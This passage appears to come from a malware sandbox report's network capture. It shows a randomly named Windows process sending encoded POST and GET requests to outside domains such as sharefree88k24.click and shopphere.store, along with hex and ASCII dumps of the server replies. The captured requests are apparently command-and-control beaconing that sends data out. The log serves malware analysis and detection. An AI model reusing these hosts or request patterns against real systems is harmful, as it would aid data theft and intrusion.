                                                            Data Ascii: ]H^c>rr)Eg|tI=R[~q_Cu~ncj*r'BGkBV}kJ$D|@zZdaa]oY$"a}L}YRkFcH[)Rjp&EP/5@EQAIgnwoxGrp"~3
                                                            Jan 11, 2025 05:40:16.043694973 CET | 224 | IN | Data Raw: 7a 69 27 f7 9c d1 46 05 9e 78 17 c7 5f 3f 1f 5f 2d 1e 04 6f a5 cd 15 58 4e c7 0f 43 fd 1e d8 00 96 6b 98 01 a9 ad 37 1b aa ab 9e 02 fb 29 0c 37 90 72 b0 d8 82 6c 11 d5 27 14 1c bd c4 78 d3 f3 52 06 85 c8 1f ef e5 fc 9b 0d ad cd 5c da 53 52 fc 12
                                                            Data Ascii: zi'Fx_?_-oXNCk7)7rl'xR\SRh.}3<U0pjef(ds(;(e%rYu}L!BnmCJ#B?;]Y!='A>?>x#{m_eHSd&Te]:[$N
                                                            Jan 11, 2025 05:40:16.043708086 CET | 1236 | IN | Data Raw: 91 e4 7e 7c f0 f3 58 94 52 bd e6 96 28 5f 01 a6 b2 0e fd f1 f1 51 fe 16 8e 37 53 64 73 a1 07 f1 31 89 07 8c ee f8 92 1a d4 0b f5 6f 9d d2 dd f1 39 d9 1a 9f 4b 5a d8 e4 ef f1 cd 67 3b 02 c4 f8 8e 2b 67 bf b6 1e f2 01 7e 5c b5 72 a5 f6 f3 5d 72 76
                                                            Data Ascii: ~|XR(_Q7Sds1o9KZg;+g~\r]rvQ,;zAr)K?=n+|ZCb)]Li9HvM|ONGtI[tQlHr0szCuD~~O[?y~TK\,%y
                                                            Jan 11, 2025 05:40:16.043720007 CET | 967 | IN | Data Raw: bf c5 61 61 1a 2f c2 b8 c1 52 00 ee 91 4a 92 04 b0 52 27 13 f8 03 e0 a2 a0 67 a7 98 fb 04 e5 88 d6 ae ba ce 09 5f c9 84 22 26 6a 9b 52 c5 56 73 a7 b1 43 2b 8f 1e 3e 7f f8 db e7 0f 8f 3e 69 a5 14 6d d1 45 8f b1 88 3d d2 da 6e 36 76 f1 8b 2e 22 d2
                                                            Data Ascii: aa/RJR'g_"&jRVsC+>>imE=n6v."h&Vh&,RD:7*##Ry[VYf0N:uSm!gDY)UJP!B0uKLhL'akdw5Xd\`F:7T(,UU<


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            3 | 192.168.2.6 | 53769 | 13.228.81.39 | 80 | 3880 | C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 05:40:17.632543087 CET | 1777 | OUT | POST /iz19/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate
                                                            Host: www.sharefree88k24.click
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1248
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.sharefree88k24.click
                                                            Referer: http://www.sharefree88k24.click/iz19/
                                                            User-Agent: HTC_Touch_HD_T8282 Opera/9.50 (Windows NT 5.1; U; it)
                                                            Data Raw: 70 4c 4e 50 63 74 6e 3d 5a 75 45 6c 74 30 59 72 7a 43 43 69 6b 51 35 42 4c 55 4d 61 59 4a 77 6a 66 4a 36 39 6c 41 4e 65 4a 53 45 65 72 79 6a 6b 61 79 4c 2b 4a 2f 41 49 6c 71 77 44 72 72 30 41 56 44 78 54 51 63 58 47 76 6a 32 52 46 77 65 45 69 68 5a 78 68 4d 43 69 75 34 6a 70 35 7a 63 70 64 62 6e 34 45 74 67 4a 61 79 2b 59 2f 78 55 30 38 79 4b 69 59 38 70 4c 2b 56 31 50 52 33 65 34 34 32 53 54 53 70 54 7a 31 53 4a 72 51 70 74 35 63 2b 70 78 44 49 2f 6a 57 6e 69 43 43 58 64 32 47 5a 64 77 43 4a 55 70 42 32 65 6c 57 30 65 67 69 4c 63 55 70 30 2b 4d 69 6e 57 55 73 31 75 38 6d 4f 31 6d 73 6b 42 70 2f 35 2f 37 7a 4b 59 59 4e 61 72 69 78 77 73 6a 45 42 52 78 72 47 79 64 38 6a 59 71 72 66 57 70 48 6e 2f 47 69 4a 4f 71 55 62 67 38 45 76 4d 71 56 7a 2b 75 34 33 38 30 69 7a 49 67 75 42 50 38 2b 35 77 37 74 6e 30 4b 52 30 62 37 55 57 6d 54 68 4c 65 2f 6e 41 41 65 75 65 48 44 79 55 2f 6a 45 64 2f 63 34 75 2b 4a 39 61 32 4b 46 39 50 6c 78 6f 4a 76 47 55 34 61 77 37 71 6f 70 51 78 37 4a 4c 58 52 54 32 6d 79 7a 4b [TRUNCATED]
                                                            Data Ascii: pLNPctn=ZuElt0YrzCCikQ5BLUMaYJwjfJ69lANeJSEeryjkayL+J/AIlqwDrr0AVDxTQcXGvj2RFweEihZxhMCiu4jp5zcpdbn4EtgJay+Y/xU08yKiY8pL+V1PR3e442STSpTz1SJrQpt5c+pxDI/jWniCCXd2GZdwCJUpB2elW0egiLcUp0+MinWUs1u8mO1mskBp/5/7zKYYNarixwsjEBRxrGyd8jYqrfWpHn/GiJOqUbg8EvMqVz+u4380izIguBP8+5w7tn0KR0b7UWmThLe/nAAeueHDyU/jEd/c4u+J9a2KF9PlxoJvGU4aw7qopQx7JLXRT2myzKWo7w9k5cP19J2J/i7cuOi6vIYE5+0T9w0LYaJLtmc9qv2DzYFen2zUXvDhgRChpdJT8xuGkULUzDjcpqevxS5h/owgx7CM2OFitgo0F4gjCWqsZPIe4hyoxXlQj7SEUyuM2G/t/t0weBX28yWoZvB1N44920iKj66U1snn+PQl08aZ6d6o+IkdIr5GDhwnPeYkO3Bilj5NNP7ZtdOQNxjqqFYvJCRkTBn1iZelipcbUYYtEMaQYyuFwNzCv4qIee2bqhDTHGwwzimhvLkHQYln2sBeaXV5jqHalz9sS9VRVx1Xuu0DwtlIPEiAs3L2uFZE7u8NJdmwygQ7xHE+srp0YHKH/0Jl8A5yNpsh7JqKz/qLSSywbGgK9rT6rNLwn+PhH382V72YseVfo20r7xZEgZNMpYyvnsIdWi3dxg74Zeus+cFUp0s4+vHqglRppmYVg48AB1A8/k8ypCP1gKjujQNuathrGeHux9Z0lc8NyFqEwdVKGY7zcWhBpNvh78VLU/s4dqry0aJcBv288P1E/MVwhOfRJW+ye1jd6YrBtOOIGhOXS3U8I2fWrLJrXca7PMJww/rQGU5deyRDN1jiQWz1D9dLKaQ7BZS5OnCKE5dzKZqOpMHlsEU3l+3MIN1KQGnz/Eol8M4Nuq5oIVEE69gy4P4WFLn7 [TRUNCATED]
                                                            Jan 11, 2025 05:40:18.583956957 CET | 1236 | IN | HTTP/1.1 200 OK
                                                            Server: openresty
                                                            Date: Sat, 11 Jan 2025 04:40:18 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
                                                            Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://p
                                                            Data Raw:
                                                            Data Ascii:
                                                            Jan 11, 2025 05:40:18.584067106 CET | 1236 | IN | Data Raw: 70 75 70 78 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 2a 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 73 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 67 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f
                                                            Data Ascii: pupx.ladi.me https://*.ladi.me https://s.ladicdn.com https://g.ladicdn.com https://w.ladicdn.com https://*.ladicdn.com https://www.facebook.com https://*.facebook.comSet-Cookie: LADI_DNS_CHECK="2025-01-11 04:40:18.424160919 +0000 UTC m=+1197
                                                            Jan 11, 2025 05:40:18.584076881 CET | 1236 | IN | Data Raw: 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 5f 50 41 54 48 3d 3b 20 50 61 74 68 3d 2f 69 7a 31 39 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f
                                                            Data Ascii: t-Cookie: LADI_CAMP_PAGE_VIEW_PATH=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT_PATH=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW=; Path=/iz19; Max-A
                                                            Jan 11, 2025 05:40:18.584254026 CET | 1236 | IN | Data Raw: 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 3d 3b 20 50 61 74 68 3d 2f 69 7a 31 39 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 5f
                                                            Data Ascii: kie: LADI_CAMP_PAGE_VIEW=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_PAGE_VIEW_PATH=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT_PATH=; Path=/iz19; Max-Age=0Set-Cook
                                                            Jan 11, 2025 05:40:18.584264040 CET | 1018 | IN | Data Raw: 9b 71 be 1b 8f c6 f9 ed 65 84 c8 80 c2 ce e8 8e 1b b7 59 24 ba ce 42 17 9d a1 95 5c 3e 6b 89 a8 3b 32 5c f1 c2 0a c7 5f 30 7e b9 15 0e f6 b1 19 2a 6d 5a ea 52 c6 1d 2f cf ac 1d 97 bc 6b b4 0a 75 f2 cb a4 50 4b 62 b8 c4 4e 53 36 ed 0c af b8 2b 9b
                                                            Data Ascii: qeY$B\>k;2\_0~*mZR/kuPKbNS6+XB\WB4X$mvyY[;%Rj#j^'bd{:Z$]HMBnT/lVh$,vvX kW`7^<0_kp.rt~.)%qQrG
                                                            Jan 11, 2025 05:40:18.584350109 CET | 1236 | IN | Data Raw: 5d f7 95 ca 82 a2 94 48 e3 d9 db 83 d0 b3 1f 5e f4 be 63 f7 04 99 9f 81 3e 0f bd 72 10 72 29 45 67 85 cd f7 7c 74 e4 ea d5 49 3d 95 96 52 5b 7e ca 71 5f 81 43 0b 84 1b be c2 0e f0 08 75 c1 7f 7e 9c 6e 63 ce fb db 81 04 bc 1c 6a 88 2a 72 b8 27 42
                                                            Data Ascii: ]H^c>rr)Eg|tI=R[~q_Cu~ncj*r'BGkBV}kJ$D|@zZdaa]oY$"a}L}YRkFcH[)Rjp&EP/5@EQAIgnwoxGrp"~3
                                                            Jan 11, 2025 05:40:18.584434986 CET | 1236 | IN | Data Raw: 7a 69 27 f7 9c d1 46 05 9e 78 17 c7 5f 3f 1f 5f 2d 1e 04 6f a5 cd 15 58 4e c7 0f 43 fd 1e d8 00 96 6b 98 01 a9 ad 37 1b aa ab 9e 02 fb 29 0c 37 90 72 b0 d8 82 6c 11 d5 27 14 1c bd c4 78 d3 f3 52 06 85 c8 1f ef e5 fc 9b 0d ad cd 5c da 53 52 fc 12
                                                            Data Ascii: zi'Fx_?_-oXNCk7)7rl'xR\SRh.}3<U0pjef(ds(;(e%rYu}L!BnmCJ#B?;]Y!='A>?>x#{m_eHSd&Te]:[$N~|XR(_
                                                            Jan 11, 2025 05:40:18.584446907 CET | 1191 | IN | Data Raw: 46 a7 49 d9 e4 f4 21 12 b8 26 de 33 d6 33 7d c8 a7 db db ae 9b ca 38 a6 a0 d8 7b 09 3b c9 57 0e a6 2f b4 a5 04 79 dd 07 41 a3 e1 45 54 4e d8 29 07 3b 21 ef 12 7e ad 05 f8 ad 15 1f 4c 3e 35 d7 67 5c 42 0e 44 d1 ec db df 1c 2b 4b 06 1e 9e 1a c7 bc
                                                            Data Ascii: FI!&33}8{;W/yAETN);!~L>5g\BD+K2t|.u$1T-d#ZXObs?b $z>d,M(Y40bHgsm8R\I*u:{^H6&|,>Iy&Fuaa/RJR'


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            4 | 192.168.2.6 | 53770 | 13.228.81.39 | 80 | 3880 | C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 05:40:20.186403036 CET | 471 | OUT | GET /iz19/?pLNPctn=UssFuDgs3yWnyhEQP3EfYsAhRMCH7zgrCGcgkyD6ajj4AvMHk5wjtqALVi5dIoOJqD+HUHGBnnVErrmet4uT5RoiUvX8LNA/Wgeh3xkS0BPrPIhQ4lBFRDGS5W/EZ42X8WJqP+8=&yL=ohjXjzZp0vl4 HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Host: www.sharefree88k24.click
                                                            Connection: close
                                                            User-Agent: HTC_Touch_HD_T8282 Opera/9.50 (Windows NT 5.1; U; it)
                                                            Jan 11, 2025 05:40:21.142358065 CET | 1236 | IN | HTTP/1.1 200 OK
                                                            Server: openresty
                                                            Date: Sat, 11 Jan 2025 04:40:21 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
                                                            Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://p
                                                            Data Raw:
                                                            Data Ascii:
                                                            Jan 11, 2025 05:40:21.142373085 CET | 224 | IN | Data Raw: 70 75 70 78 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 2a 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 73 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 67 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f
                                                            Data Ascii: pupx.ladi.me https://*.ladi.me https://s.ladicdn.com https://g.ladicdn.com https://w.ladicdn.com https://*.ladicdn.com https://www.facebook.com https://*.facebook.comSet-Cookie: LADI_DNS_CHECK="2025-01-11 04:40:20.98148803
                                                            Jan 11, 2025 05:40:21.142400980 CET | 1236 | IN | Data Raw: 35 20 2b 30 30 30 30 20 55 54 43 20 6d 3d 2b 31 31 39 37 32 35 36 2e 32 36 35 38 38 32 36 35 33 22 3b 20 45 78 70 69 72 65 73 3d 54 75 65 2c 20 30 39 20 4a 61 6e 20 32 30 33 35 20 30 34 3a 34 30 3a 32 30 20 47 4d 54 0d 0a 53 65 74 2d 43 6f 6f 6b
                                                            Data Ascii: 5 +0000 UTC m=+1197256.265882653"; Expires=Tue, 09 Jan 2035 04:40:20 GMTSet-Cookie: LADI_CLIENT_ID=5ce92432-f836-4aa9-7718-30ca903578af; Expires=Tue, 09 Jan 2035 04:40:20 GMTSet-Cookie: LADI_PAGE_VIEW=0; Path=/iz19; Expires=Tue, 09 Jan 203
                                                            Jan 11, 2025 05:40:21.142509937 CET | 1236 | IN | Data Raw: 3b 20 50 61 74 68 3d 2f 69 7a 31 39 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 42 45 48 41 56 49 4f 52 5f 50 41 47 45 5f 56 49 45 57 5f 50 41 54 48 3d 3b 20 50 61 74 68 3d 2f 69 7a 31
                                                            Data Ascii: ; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW_PATH=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_FORMSUBMIT=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_FORMSUBMIT_PATH=; Path=/iz19; Max-Age=0Set-Cook
                                                            Jan 11, 2025 05:40:21.142522097 CET | 1236 | IN | Data Raw: 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 42 45 48 41 56 49 4f 52 5f 50 41 47 45 5f 56 49 45 57 3d 3b 20 50 61 74 68 3d 2f 69 7a 31 39 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43
                                                            Data Ascii: Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW_PATH=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_FORMSUBMIT=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVI
                                                            Jan 11, 2025 05:40:21.142597914 CET | 1236 | IN | Data Raw: 28 22 6d 65 74 61 22 29 3b 64 6f 63 56 69 65 77 70 6f 72 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 20 22 76 69 65 77 70 6f 72 74 22 29 3b 64 6f 63 56 69 65 77 70 6f 72 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65
                                                            Data Ascii: ("meta");docViewport.setAttribute("id", "viewport");docViewport.setAttribute("name", "viewport");docViewport.setAttribute("content", content);document.head.appendChild(docViewport);})();</script><meta property="og:title" content="404" /><meta
                                                            Jan 11, 2025 05:40:21.142707109 CET | 896 | IN | Data Raw: 61 6e 2c 73 74 72 69 6b 65 2c 73 74 72 6f 6e 67 2c 73 75 62 2c 73 75 6d 6d 61 72 79 2c 73 75 70 2c 74 61 62 6c 65 2c 74 62 6f 64 79 2c 74 64 2c 74 65 78 74 61 72 65 61 2c 74 66 6f 6f 74 2c 74 68 2c 74 68 65 61 64 2c 74 69 6d 65 2c 74 72 2c 74 74
                                                            Data Ascii: an,strike,strong,sub,summary,sup,table,tbody,td,textarea,tfoot,th,thead,time,tr,tt,u,ul,var,video{margin:0;padding:0;border:0;outline:0;font-size:100%;font:inherit;vertical-align:baseline;box-sizing:border-box;-webkit-font-smoothing:antialiase
                                                            Jan 11, 2025 05:40:21.142770052 CET | 1236 | IN | Data Raw: 28 30 2c 30 2c 30 2c 2e 33 29 7d 2e 6c 61 64 69 70 61 67 65 2d 6d 65 73 73 61 67 65 20 2e 6c 61 64 69 70 61 67 65 2d 6d 65 73 73 61 67 65 2d 62 6f 78 7b 77 69 64 74 68 3a 34 30 30 70 78 3b 6d 61 78 2d 77 69 64 74 68 3a 63 61 6c 63 28 31 30 30 25
                                                            Data Ascii: (0,0,0,.3)}.ladipage-message .ladipage-message-box{width:400px;max-width:calc(100% - 50px);height:160px;border:1px solid rgba(0,0,0,.3);background-color:#fff;position:fixed;top:calc(50% - 155px);left:0;right:0;margin:auto;border-radius:10px}.l
                                                            Jan 11, 2025 05:40:21.142781019 CET | 1236 | IN | Data Raw: 64 6e 2e 63 6f 6d 2f 76 32 2f 73 6f 75 72 63 65 2f 6c 61 64 69 2d 69 63 6f 6e 73 2e 73 76 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 34 70 78 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b
                                                            Data Ascii: dn.com/v2/source/ladi-icons.svg) no-repeat;background-position:4px;cursor:pointer;z-index:90000050}.ladi-section.ladi-section-readmore{transition:height 350ms linear 0s}.ladi-section .ladi-section-background{position:absolute;content:'';displa
                                                            Jan 11, 2025 05:40:21.142791986 CET | 1236 | IN | Data Raw: 61 64 69 2d 67 61 6c 6c 65 72 79 20 2e 6c 61 64 69 2d 67 61 6c 6c 65 72 79 2d 76 69 65 77 3e 2e 6c 61 64 69 2d 67 61 6c 6c 65 72 79 2d 76 69 65 77 2d 69 74 65 6d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 76 65 72 3b 62 61 63 6b 67
                                                            Data Ascii: adi-gallery .ladi-gallery-view>.ladi-gallery-view-item{background-size:cover;background-repeat:no-repeat;background-position:center center;width:100%;height:100%;position:relative;display:none;transition:transform 350ms ease-in-out;-webkit-bac
                                                            Jan 11, 2025 05:40:21.147396088 CET | 1236 | IN | Data Raw: 6c 61 64 69 2d 67 61 6c 6c 65 72 79 2d 76 69 65 77 3e 2e 6e 65 78 74 7b 6c 65 66 74 3a 31 30 30 25 7d 2e 6c 61 64 69 2d 67 61 6c 6c 65 72 79 20 2e 6c 61 64 69 2d 67 61 6c 6c 65 72 79 2d 76 69 65 77 3e 2e 70 72 65 76 7b 6c 65 66 74 3a 2d 31 30 30
                                                            Data Ascii: ladi-gallery-view>.next{left:100%}.ladi-gallery .ladi-gallery-view>.prev{left:-100%}.ladi-gallery .ladi-gallery-view>.next.left,.ladi-gallery .ladi-gallery-view>.prev.right{left:0}.ladi-gallery .ladi-gallery-view>.selected.left{left:-100%}.lad


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            5 | 192.168.2.6 | 53771 | 209.74.79.40 | 80 | 3880 | C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 05:40:34.576555014 CET | 725 | OUT | POST /bq63/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate
                                                            Host: www.shopphere.store
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 212
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.shopphere.store
                                                            Referer: http://www.shopphere.store/bq63/
                                                            User-Agent: HTC_Touch_HD_T8282 Opera/9.50 (Windows NT 5.1; U; it)
                                                            Data Raw: 70 4c 4e 50 63 74 6e 3d 45 4f 69 30 48 30 68 4e 78 73 77 44 58 7a 6e 42 64 32 39 59 39 79 75 2b 42 46 6e 74 6b 51 4b 45 44 59 75 55 47 2b 74 5a 63 68 4f 77 34 2b 53 6c 62 52 79 49 38 64 71 4b 58 4d 59 54 75 53 58 52 71 6a 59 4e 6a 43 44 75 64 4c 59 71 63 6e 51 42 62 46 58 76 65 56 41 72 5a 6b 74 46 7a 70 4f 70 64 75 42 30 6d 70 72 6f 31 68 4b 57 79 76 66 6d 77 69 41 70 31 68 32 36 46 2f 4e 46 57 51 74 31 39 6a 6d 68 74 32 30 33 4b 68 5a 4f 39 79 72 6d 54 44 4d 33 34 2b 31 42 2b 39 55 4d 58 63 6c 61 52 38 74 70 7a 55 6d 34 4b 43 79 41 38 77 38 32 36 43 43 4b 78 78 75 68 31 6b 45 6a 62 6c 42 33 50 4e 45 31 53 63 53 7a 44 57 2f 4b
                                                            Data Ascii: pLNPctn=EOi0H0hNxswDXznBd29Y9yu+BFntkQKEDYuUG+tZchOw4+SlbRyI8dqKXMYTuSXRqjYNjCDudLYqcnQBbFXveVArZktFzpOpduB0mpro1hKWyvfmwiAp1h26F/NFWQt19jmht203KhZO9yrmTDM34+1B+9UMXclaR8tpzUm4KCyA8w826CCKxxuh1kEjblB3PNE1ScSzDW/K
                                                            Jan 11, 2025 05:40:35.161891937 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                            Date: Sat, 11 Jan 2025 04:40:35 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            6 | 192.168.2.6 | 53772 | 209.74.79.40 | 80 | 3880 | C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 05:40:37.130539894 CET | 749 | OUT | POST /bq63/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate
                                                            Host: www.shopphere.store
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 236
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.shopphere.store
                                                            Referer: http://www.shopphere.store/bq63/
                                                            User-Agent: HTC_Touch_HD_T8282 Opera/9.50 (Windows NT 5.1; U; it)
